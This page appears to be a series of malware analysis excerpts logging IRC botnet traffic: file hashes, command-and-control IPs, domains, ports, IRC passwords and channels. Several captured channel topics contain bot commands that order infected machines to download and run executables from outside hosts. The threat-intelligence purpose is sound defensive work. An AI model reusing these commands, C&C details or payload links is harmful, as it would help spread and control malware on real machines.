Author: Pig

File Details MD5 55c55f7764767fd46909b95b1e64b2d1 SHA-1 964d2183f263be8bc565d3dd307486614e5d6ce1 File Type exe First Received (GMT+8) 2012-02-18 06:49:00 Size (bytes) 8704 Weightage 147 virustotal.com 29 vendors detected Static File Header ++++++++++++++++++++++++ FILE HEADER INFORMATION +++++++++++++++++++++++++ TimeStamp: 4F1DB86E Tue Jan 24 03:43:42 2012 Subsystem: 2 (Windows GUI) Image Base: 00400000 Size: 00006000 Code Base: 00001000 Size: 00001600 Data Base: 00003000Read more...

Remote Host Port Number 122.155.18.83 2345 NICK New[USA|00|P|79102] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-4584 * 0 :COMPUTERNAME MODE New[USA|00|P|79102] -ix JOIN #!loco! PONG 22 MOTD Now talking in #!loco! Topic On: [ #!loco! ] [ .m.s|.m.e haha foto 😛 http://goo.gl/W2EOO?= ] Topic By: [ wd44Read more...

Resolved : [webingenial.com] To [178.86.30.169] port 1865 Resolved : [webingenial.com] To [213.155.7.39] port 1865 Remote Host Port Number 178.86.30.169 1865 PASS ngrBot 213.155.7.39 1865 PASS ngrBot NICK n{US|XPa}rwslldg USER rwslldg 0 0 :rwslldg Now talking in #main Topic On: [ #main ] [ .m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r ] Topic By: [ fckoffoOo ]Read more...

Very big botnet allready posted diferent domain names from this net here Resolved : [jer0001.in] To [208.83.233.194] port 1889 Resolved : [jer0001.in] To [208.83.232.90] port 1889 Resolved : [jer0001.in] To [208.83.234.66] port 1889 HTTP Conversations: 199.15.234.7:80 – [api.wipmania.com] Request: GET / Response: 200 “OK” 199.7.177.218:80 – [hotfile.com] Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe Response: 302 “Found” 74.120.11.30:80 –Read more...

Resolved : [zaber.zaberhmar.com] To [109.236.86.227] Resolved : [zaber.zaberhmar.com] To [80.79.115.30] Resolved : [zaber.zaberhmar.com] To [109.236.80.114] Resolved : [zaber.zaberhmar.com] To [217.23.9.116] Resolved : [zaber.zaberhmar.com] To [94.102.56.158] Resolved : [zaber.zaberhmar.com] To [50.7.241.242] Resolved : [zaber.zaberhmar.com] To [80.82.64.69] Resolved : [zaber.zaberhmar.com] To [217.23.1.100] Resolved : [zaber.zaberhmar.com] To [217.23.7.147] TCP Connection Attempts: 109.236.80.114:8800 80.79.115.30:8800 109.236.86.227:8800 217.23.9.116:8800 94.102.56.158:8800 50.7.241.242:8800 MalwareRead more...

This malware spread through email,exe infection,injects into explorer.exe,downloads other malwares and is controled through http sec.ka3ek2.com DNS_TYPE_A 31.44.184.232 Infected SMTP Servers used from this malware for spaming Resolved : [mx3.hotmail.com] To [65.54.188.72] Resolved : [mx3.hotmail.com] To [65.54.188.94] Resolved : [mx3.hotmail.com] To [65.55.92.152] Resolved : [mx3.hotmail.com] To [65.55.37.120] Resolved : [mx3.hotmail.com] To [65.55.37.104] Resolved : [mx3.hotmail.com]Read more...

Remote Host Port Number 199.15.234.7 80 67.222.146.210 6060 PASS saher NICK n{US|XPa}exohsgb USER exohsgb 0 0 :exohsgb JOIN #ksa ksa1 hosting infos: http://whois.domaintools.com/67.222.146.210

Domain names used to control the botnet: hdp.zapto.org 46.166.141.149 active 1n1.sytes.net 213.155.7.39 active hdp.zapto.org not active hgjma1.biz not active jma1.biz not active mooo.com 72.8.150.1 active n1.mooo.com 86.35.19.116 active fhdp.zapto.org Remote Host Port Number 199.15.234.7 80 50.22.107.93 80 213.155.7.39 2009 PASS ngr NICK n{US|XPa}dcbcoox USER dcbcoox 0 0 :dcbcoox JOIN #juaz ngrBot PRIVMSG #juaz :[d=”http://creatucurso.net/facu/mx.exe” s=”198683Read more...

Remote Host Port Number 216.246.78.247 2345 NICK New[USA|00|P|75060] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-9002 * 0 :COMPUTERNAME MODE New[USA|00|P|75060] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/216.246.78.247

tool.manitam.com 176.227.199.27 dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 C&C Server: 176.227.199.27:6669 Server Password: Username: m0x Nickname: [x0x]XP92288 Channel: #d0x (Password: ) Channeltopic: Bot Config: On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMircRead more...